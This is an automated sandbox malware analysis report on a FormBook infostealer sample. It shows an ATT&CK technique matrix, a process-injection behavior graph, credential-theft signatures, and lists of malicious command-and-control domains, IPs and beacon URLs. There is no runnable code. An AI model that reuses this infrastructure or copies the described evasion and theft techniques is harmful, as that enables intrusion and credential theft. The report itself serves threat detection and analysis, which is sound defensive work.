                Source: Yara matchFile source: 00000009.00000002.3132931690.0000000008020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3124924415.0000000004A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_00948C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00948C4F
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0094923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_0094923B
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_009258C5 RpcBindingSetOption,_LocaleUpdate::_LocaleUpdate,_memset,WideCharToMultiByte,GetLastError,_memset,0_2_009258C5
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                2
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                3
                Obfuscated Files or Information
                NTDS116
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                DLL Side-Loading
                LSA Secrets151
                Security Software Discovery
                SSH3
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts312
                Process Injection
                2
                Valid Accounts
                Cached Domain Credentials2
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem1
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1559171 Sample: A2028041200SD.exe Startdate: 20/11/2024 Architecture: WINDOWS Score: 100 31 www.dating-apps-az-dn5.xyz 2->31 33 www.beylikduzu616161.xyz 2->33 35 15 other IPs or domains 2->35 39 Suricata IDS alerts for network traffic 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 Yara detected FormBook 2->43 47 3 other signatures 2->47 10 A2028041200SD.exe 2 2->10         started        signatures3 45 Performs DNS queries to domains with low reputation 33->45 process4 signatures5 57 Binary is likely a compiled AutoIt script file 10->57 59 Writes to foreign memory regions 10->59 61 Maps a DLL or memory area into another process 10->61 63 Switches to a custom stack to bypass stack traces 10->63 13 svchost.exe 10->13         started        process6 signatures7 65 Maps a DLL or memory area into another process 13->65 16 zJGHFZpQDL.exe 13->16 injected process8 dnsIp9 25 thaor56.online 202.92.5.23, 49985, 49986, 49987 VNPT-AS-VNVNPTCorpVN Viet Nam 16->25 27 www.zxyck.net 118.107.250.103, 50001, 50002, 50003 OCENET-AS-APOCESdnBhdISPMY Hong Kong 16->27 29 9 other IPs or domains 16->29 37 Found direct / indirect Syscall (likely to bypass EDR) 16->37 20 winrs.exe 13 16->20         started        signatures10 process11 signatures12 49 Tries to steal Mail credentials (via file / registry access) 20->49 51 Tries to harvest and steal browser information (history, passwords, etc) 20->51 53 Modifies the context of a thread in another process (thread injection) 20->53 55 2 other signatures 20->55 23 firefox.exe 20->23         started        process13

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                A2028041200SD.exe32%ReversingLabsWin32.Trojan.AutoitInject
                A2028041200SD.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.superiorfencing.net/bwyw/0%Avira URL Cloudsafe
                http://www.maitreyatoys.world/dvmh/0%Avira URL Cloudsafe
                http://www.orbitoasis.online/k6yn/0%Avira URL Cloudsafe
                http://www.earbudsstore.shop/0gis/0%Avira URL Cloudsafe
                http://www.beylikduzu616161.xyz/2nga/0%Avira URL Cloudsafe
                http://www.dating-apps-az-dn5.xyz/pn0u/0%Avira URL Cloudsafe
                http://www.dailyfuns.info/n9b0/0%Avira URL Cloudsafe
                https://zkdamdjj.shop/vluw/?prh4=Qny9vPKZpQxlYqiHBli6Dgd1W9OHStFoVbvPUumHvVgYiZzoUIcT00lHd/ClJ1QqOMs0%Avira URL Cloudsafe
                http://www.dating-apps-az-dn5.xyz0%Avira URL Cloudsafe
                http://www.earbudsstore.shop/0gis?gp=1&js=1&uuid=1732091041.9737598049&other_args=eyJ1cmkiOiAiLzBnaX0%Avira URL Cloudsafe
                http://www70.earbudsstore.shop/0%Avira URL Cloudsafe
                http://www.mydreamdeal.click/1ag2/0%Avira URL Cloudsafe
                http://www.75178.club/a4h7/0%Avira URL Cloudsafe
                http://www.thaor56.online/cboa/0%Avira URL Cloudsafe
                http://www.zxyck.net/gxyh/0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.mydreamdeal.click
                188.114.96.3
                truetrue
                  unknown
                  www.maitreyatoys.world
                  194.245.148.189
                  truetrue
                    unknown
                    www.zxyck.net
                    118.107.250.103
                    truetrue
                      unknown
                      www.dating-apps-az-dn5.xyz
                      199.59.243.227
                      truetrue
                        unknown
                        superiorfencing.net
                        103.230.159.86
                        truetrue
                          unknown
                          thaor56.online
                          202.92.5.23
                          truetrue
                            unknown
                            www.zkdamdjj.shop
                            188.114.97.3
                            truetrue
                              unknown
                              www.earbudsstore.shop
                              194.195.220.41
                              truetrue
                                unknown
                                www.beylikduzu616161.xyz
                                188.114.97.3
                                truetrue
                                  unknown
                                  www.dailyfuns.info
                                  209.74.77.109
                                  truetrue
                                    unknown
                                    gtml.huksa.huhusddfnsuegcdn.com
                                    23.167.152.41
                                    truefalse
                                      high
                                      orbitoasis.online
                                      66.29.132.194
                                      truetrue
                                        unknown
                                        www.75178.club
                                        unknown
                                        unknownfalse
                                          unknown
                                          www.orbitoasis.online
                                          unknown
                                          unknownfalse
                                            unknown
                                            www.superiorfencing.net
                                            unknown
                                            unknownfalse
                                              unknown
                                              www.thaor56.online
                                              unknown
                                              unknownfalse
                                                unknown
                                                NameMaliciousAntivirus DetectionReputation
                                                http://www.beylikduzu616161.xyz/2nga/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.superiorfencing.net/bwyw/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.maitreyatoys.world/dvmh/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.orbitoasis.online/k6yn/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.earbudsstore.shop/0gis/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.dailyfuns.info/n9b0/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.dating-apps-az-dn5.xyz/pn0u/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.mydreamdeal.click/1ag2/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.thaor56.online/cboa/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.75178.club/a4h7/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.zxyck.net/gxyh/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://duckduckgo.com/chrome_newtabwinrs.exe, 0000000A.00000003.1584328647.00000000079A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://duckduckgo.com/ac/?q=winrs.exe, 0000000A.00000003.1584328647.00000000079A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icowinrs.exe, 0000000A.00000003.1584328647.00000000079A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.earbudsstore.shop/0gis?gp=1&js=1&uuid=1732091041.9737598049&other_args=eyJ1cmkiOiAiLzBnaXzJGHFZpQDL.exe, 00000009.00000002.3131138704.000000000661C000.00000004.80000000.00040000.00000000.sdmp, winrs.exe, 0000000A.00000002.3125614806.0000000003E5C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=winrs.exe, 0000000A.00000003.1584328647.00000000079A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=winrs.exe, 0000000A.00000003.1584328647.00000000079A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.ecosia.org/newtab/winrs.exe, 0000000A.00000003.1584328647.00000000079A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://zkdamdjj.shop/vluw/?prh4=Qny9vPKZpQxlYqiHBli6Dgd1W9OHStFoVbvPUumHvVgYiZzoUIcT00lHd/ClJ1QqOMszJGHFZpQDL.exe, 00000009.00000002.3131138704.0000000005FD4000.00000004.80000000.00040000.00000000.sdmp, winrs.exe, 0000000A.00000002.3125614806.0000000003814000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1691083286.0000000037E24000.00000004.80000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.dating-apps-az-dn5.xyzzJGHFZpQDL.exe, 00000009.00000002.3132931690.00000000080DE000.00000040.80000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://ac.ecosia.org/autocomplete?q=winrs.exe, 0000000A.00000003.1584328647.00000000079A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://joker.com/?pk_campaign=Parking&pk_kwd=textzJGHFZpQDL.exe, 00000009.00000002.3131138704.0000000006F88000.00000004.80000000.00040000.00000000.sdmp, winrs.exe, 0000000A.00000002.3125614806.00000000047C8000.00000004.10000000.00040000.00000000.sdmp, winrs.exe, 0000000A.00000002.3127930198.0000000005E00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www70.earbudsstore.shop/winrs.exe, 0000000A.00000002.3125614806.0000000003E5C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referzJGHFZpQDL.exe, 00000009.00000002.3131138704.00000000062F8000.00000004.80000000.00040000.00000000.sdmp, winrs.exe, 0000000A.00000002.3125614806.0000000003B38000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                  high
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwinrs.exe, 0000000A.00000003.1584328647.00000000079A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=winrs.exe, 0000000A.00000003.1584328647.00000000079A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs
                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      194.195.220.41
                                                                      www.earbudsstore.shopGermany
                                                                      6659NEXINTO-DEtrue
                                                                      209.74.77.109
                                                                      www.dailyfuns.infoUnited States
                                                                      31744MULTIBAND-NEWHOPEUStrue
                                                                      188.114.97.3
                                                                      www.zkdamdjj.shopEuropean Union
                                                                      13335CLOUDFLARENETUStrue
                                                                      103.230.159.86
                                                                      superiorfencing.netAustralia
                                                                      133159MAMMOTHMEDIA-AS-APMammothMediaPtyLtdAUtrue
                                                                      194.245.148.189
                                                                      www.maitreyatoys.worldGermany
                                                                      5517CSLDEtrue
                                                                      23.167.152.41
                                                                      gtml.huksa.huhusddfnsuegcdn.comReserved
                                                                      395774ESVC-ASNUSfalse
                                                                      188.114.96.3
                                                                      www.mydreamdeal.clickEuropean Union
                                                                      13335CLOUDFLARENETUStrue
                                                                      66.29.132.194
                                                                      orbitoasis.onlineUnited States
                                                                      19538ADVANTAGECOMUStrue
                                                                      118.107.250.103
                                                                      www.zxyck.netHong Kong
                                                                      24321OCENET-AS-APOCESdnBhdISPMYtrue
                                                                      199.59.243.227
                                                                      www.dating-apps-az-dn5.xyzUnited States
                                                                      395082BODIS-NJUStrue
                                                                      202.92.5.23
                                                                      thaor56.onlineViet Nam
                                                                      45899VNPT-AS-VNVNPTCorpVNtrue
                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1559171
                                                                      Start date and time:2024-11-20 09:21:38 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 8m 46s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Run name:Run with higher sleep bypass
                                                                      Number of analysed new started processes analysed:16
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:1
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:A2028041200SD.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@7/3@14/11
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HCA Information:
                                                                      • Successful, ratio: 98%
                                                                      • Number of executed functions: 53
                                                                      • Number of non-executed functions: 296
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                      • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                                                                      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                      • VT rate limit hit for: A2028041200SD.exe
                                                                      No simulations
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      194.195.220.41SecuriteInfo.com.Win32.Malware-gen.10660.18305.exeGet hashmaliciousFormBookBrowse
                                                                      • www.gemtastic.shop/junu/
                                                                      Quotation-27-08-24.exeGet hashmaliciousFormBookBrowse
                                                                      • www.techcables.shop/0hup/
                                                                      TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exeGet hashmaliciousFormBookBrowse
                                                                      • www.ytonetgearhub.shop/l8y2/
                                                                      swift_payment_pdf.exeGet hashmaliciousFormBookBrowse
                                                                      • www.cheapdesklamp.shop/9nq7/
                                                                      188.114.97.3Delivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                                                      • radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
                                                                      ce.vbsGet hashmaliciousUnknownBrowse
                                                                      • paste.ee/d/lxvbq
                                                                      Label_00000852555.doc.jsGet hashmaliciousUnknownBrowse
                                                                      • tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
                                                                      PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                                      • www.ssrnoremt-rise.sbs/3jsc/
                                                                      QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • filetransfer.io/data-package/zWkbOqX7/download
                                                                      http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                      • kklk16.bsyo45ksda.top/favicon.ico
                                                                      gusetup.exeGet hashmaliciousUnknownBrowse
                                                                      • www.glarysoft.com/update/glary-utilities/pro/pro50/
                                                                      Online Interview Scheduling Form.lnkGet hashmaliciousDucktailBrowse
                                                                      • gmtagency.online/api/check
                                                                      View Pdf Doc_0b40e7d2137cd39647abbd9321b34da7.htmGet hashmaliciousUnknownBrowse
                                                                      • f7xiz.nhgrt.top/Kbo731/96f7xiZ96?&&V5G=YW5kZXJzLmhhcnR1bmcuY2hyaXN0ZW5zZW5Acm9ja3dvb2wuY29t
                                                                      SWIFT 103 202414111523339800 111124.pdf.vbsGet hashmaliciousRemcosBrowse
                                                                      • paste.ee/d/YU1NN
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      gtml.huksa.huhusddfnsuegcdn.comneed quotations.exeGet hashmaliciousFormBookBrowse
                                                                      • 23.167.152.41
                                                                      rGO880-PDF.exeGet hashmaliciousFormBookBrowse
                                                                      • 206.119.185.138
                                                                      Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                      • 206.119.185.141
                                                                      Maryam Farokhi-PhD- CV-1403.exeGet hashmaliciousFormBookBrowse
                                                                      • 23.167.152.41
                                                                      NIlfETZ9aE.exeGet hashmaliciousFormBookBrowse
                                                                      • 206.119.185.226
                                                                      s200ld6btf.exeGet hashmaliciousFormBookBrowse
                                                                      • 206.119.185.225
                                                                      MV Sunshine.exeGet hashmaliciousFormBookBrowse
                                                                      • 206.119.185.225
                                                                      dzkb5Gfd33.exeGet hashmaliciousFormBookBrowse
                                                                      • 206.119.185.189
                                                                      Nowe zam#U00f3wienie zakupu pdf.exeGet hashmaliciousFormBookBrowse
                                                                      • 206.119.185.165
                                                                      Pedido de Cota#U00e7#U00e3o - RFQ 31072024_Lista comercial.bat.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • 194.41.37.250
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                      • 188.114.97.3
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 188.114.97.3
                                                                      SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                      • 104.21.4.93
                                                                      MB267382625AE.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 188.114.96.3
                                                                      file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                      • 188.114.96.3
                                                                      Quote specification and BOQ.exeGet hashmaliciousGuLoaderBrowse
                                                                      • 188.114.96.3
                                                                      QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 188.114.96.3
                                                                      Delivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                                                      • 188.114.97.3
                                                                      Delivery_Notification_00000875664.doc.jsGet hashmaliciousUnknownBrowse
                                                                      • 188.114.97.3
                                                                      MyInstaller_PDFGear.exeGet hashmaliciousUnknownBrowse
                                                                      • 104.26.1.29
                                                                      MAMMOTHMEDIA-AS-APMammothMediaPtyLtdAUhttps://astonishing-maize-sunstone.glitch.me/Get hashmaliciousUnknownBrowse
                                                                      • 103.1.185.157
                                                                      http://hrlaw.com.auGet hashmaliciousUnknownBrowse
                                                                      • 103.16.131.131
                                                                      http://coastiesmag.com.auGet hashmaliciousUnknownBrowse
                                                                      • 103.4.234.120
                                                                      TRe8oqmYKc.elfGet hashmaliciousMiraiBrowse
                                                                      • 103.16.161.29
                                                                      cundi.mips.elfGet hashmaliciousMiraiBrowse
                                                                      • 103.16.161.29
                                                                      cundi.x86.elfGet hashmaliciousMiraiBrowse
                                                                      • 103.16.161.29
                                                                      cundi.x86_64.elfGet hashmaliciousMiraiBrowse
                                                                      • 103.16.161.29
                                                                      cundi.arm7.elfGet hashmaliciousMiraiBrowse
                                                                      • 103.16.161.29
                                                                      cundi.arm.elfGet hashmaliciousMiraiBrowse
                                                                      • 103.16.161.29
                                                                      http://agrisemm.comGet hashmaliciousUnknownBrowse
                                                                      • 43.229.61.61
                                                                      NEXINTO-DEbotnet.spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                      • 194.64.167.187
                                                                      meerkat.mips.elfGet hashmaliciousMiraiBrowse
                                                                      • 194.163.45.5
                                                                      meerkat.x86.elfGet hashmaliciousMiraiBrowse
                                                                      • 194.233.145.180
                                                                      tyo.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                      • 194.233.65.110
                                                                      New PO [FK4-7173].pdf.exeGet hashmaliciousFormBookBrowse
                                                                      • 194.195.220.41
                                                                      bin.mips.elfGet hashmaliciousMiraiBrowse
                                                                      • 212.228.79.8
                                                                      arm.elfGet hashmaliciousMirai, GafgytBrowse
                                                                      • 212.229.190.20
                                                                      sh4.elfGet hashmaliciousMiraiBrowse
                                                                      • 195.179.84.16
                                                                      splx86.elfGet hashmaliciousUnknownBrowse
                                                                      • 194.64.162.15
                                                                      nabmips.elfGet hashmaliciousUnknownBrowse
                                                                      • 212.228.44.65
                                                                      MULTIBAND-NEWHOPEUShttps://hmjpvx0wn1.gaimensebb.shop/Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                      • 209.74.95.101
                                                                      Order No 24.exeGet hashmaliciousFormBookBrowse
                                                                      • 209.74.64.58
                                                                      dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeGet hashmaliciousFormBookBrowse
                                                                      • 209.74.64.187
                                                                      RFQ.exeGet hashmaliciousFormBookBrowse
                                                                      • 209.74.64.58
                                                                      DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exeGet hashmaliciousFormBookBrowse
                                                                      • 209.74.64.59
                                                                      https://u47618913.ct.sendgrid.net/ls/click?upn=u001.ySazWJ5NZMDRHbOtEU-2BeoVq5CHimfeKOmAStZ-2FBgQMYQ3SSwsETAhk1yN-2BT4-2Bp2oKYzZov6D-2F-2FVWJZ1NqqUA8rkCQTGD9qAyzE3VfFeoQ2nuSJqqyEFkZOdD2fHyfAGMqPTrK5an3w0r3jeoJ-2B5P7rAm7lpee2LRBP-2FVZ8vpCC6OhMnZUP9C90hQTb0-2BpgFS16pphNEcXB1XFdv8oIx-2FwRORRrbhR98R4uG9rtcNDDwGDlWsc4rC8kZPQKm-2F1Mm8tNwYXTNsqE7C9scBPWKFj8-2Flkc4ljwpAg27SdTSH4Lv1yIeDUc-2Br14vSnR5hortDhaaXBKI0vawIBQmkU8qdJOSHyv8egzfUQvo0FmhKgqV1moo-2BnRe99IbJ35dDYZE0MrccJKFnB5BMI9ztOOsnQMWDWj4usmLc-2BeVbqm24LsVBI18WzbkH2NLJelVG2ts-2FY8NEmgO2IHd2ydt-2BhAOvQWuc-2BoCn3Ao-2FeTWrPbny4XNYysHB9Qu5AO8kwT-2BngJOg10GMOXJS1JsoXicgqZmKM-2B-2FBOfXRHNWtl98FVLgmqGL1yDRbHi-2BrUHFtCwtB3BRDatptZmQIPNmSCXkxadq8IAoDDcDLc8BntBCtxPjmUSXgMaBFfsbPygwonXOkWZIQIxp1wvHXj-2BZ1eIGRPTwfugS5VMB7jYi-2FePeZ2P8ejmUXu0aUYor7jxsavDdhhTlU0d3WGd7xXyc70gSNl4s0N8kb-2FhMFZ3OuPfAMZG-2BGWl7Vsgw97GpKKLJX78rYX8Dtq0-2BFHI8oijeDXiQEnvU-2FI4F3F63PGiFfTUlwdYZGBzmjvsDN3AL1dSwty6HpxvSAKCtZ9VWrfa8NwcaFPKhxnxW4r2AR9TTWpNatEfU14LjPxEM-2F6jXkw8omQsSQ5ERlG1h6ZTouS0rz5yiYIeyCUVpUuOT4FtnK35YgC-2B0S-2FAum0FNVEv9aFTVDigH5szZA6pWOYsjwY5forGtNE55v7VxXGbkIRiEOYPWjYX7vj5EKbcmwdWMu8O3989atXdomEpBZG0cX1ylWoweLRVGVMNbSs-2FOqs-2B2xH8pdGj9VcybpSShtsD0ZIyshNyN0TwKGcJvKUNgMPDQVU64V5WleuedIajiM6uCp0xLc8RFYl0z-2B6RGF9NRTuzleNM-2Fg7hwq-2BEg52eVJjsFh3FdZjf0sr4TFySEDrqq3wci8zEr-2FI5c5Wj-2Fk-2F98bI-2FtCrFbLhfO78CKXQ3KYT53otrRT47GTmw-3D-3DwgKy_cipWnXOVDIhOM-2BBXOyzcHeOgQULBtPxx5riDWemF2G-2BwYzp7goEAXusjqSQprai9ZAQSor3gqS04DnqVBNX-2B27UevOScScKFnEaHJjzQ16GEAAakNELZybevGcJfbhSMyz-2FBkUhDktUr20hzj2tsCmKBBmBXnfL9SKUCvI82Axz3RMcAfJhD5XZvwDkb1SgvyUaaM4lOGnGhDtzRF5NN8-2FlqjhJjS-2FU6ncYoAfO4VYI-3DGet hashmaliciousHTMLPhisherBrowse
                                                                      • 209.74.72.93
                                                                      statement of accounts.exeGet hashmaliciousFormBookBrowse
                                                                      • 209.74.64.58
                                                                      rGO880-PDF.exeGet hashmaliciousFormBookBrowse
                                                                      • 209.74.64.59
                                                                      RFQ.exeGet hashmaliciousFormBookBrowse
                                                                      • 209.74.64.58
                                                                      Selected_Items.vbsGet hashmaliciousFormBookBrowse
                                                                      • 209.74.64.59
                                                                      No context
                                                                      No context
                                                                      Process:C:\Windows\SysWOW64\winrs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1211596417522893
                                                                      Encrypted:false
                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                                      MD5:0AB67F0950F46216D5590A6A41A267C7
                                                                      SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                                      SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                                      SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\Desktop\A2028041200SD.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):287744
                                                                      Entropy (8bit):7.994548369199958
                                                                      Encrypted:true
                                                                      SSDEEP:6144:5hxWvSxwYVGnPlNYkHrQLjnJHfg1KtQUJ3+UDR5tcTkXt7rkV9:Dy/Y8PlNYkHrINo1aQUJ3vl5tcgXt7rq
                                                                      MD5:292E198398B4804ED9B1225A460B6E95
                                                                      SHA1:EF119638F6151A1A4B7B0A6DF96817C8CCD2647B
                                                                      SHA-256:068B8518B839676C57BA3CC4D14C41BBA20BED264781472AA4AE7922A0B67957
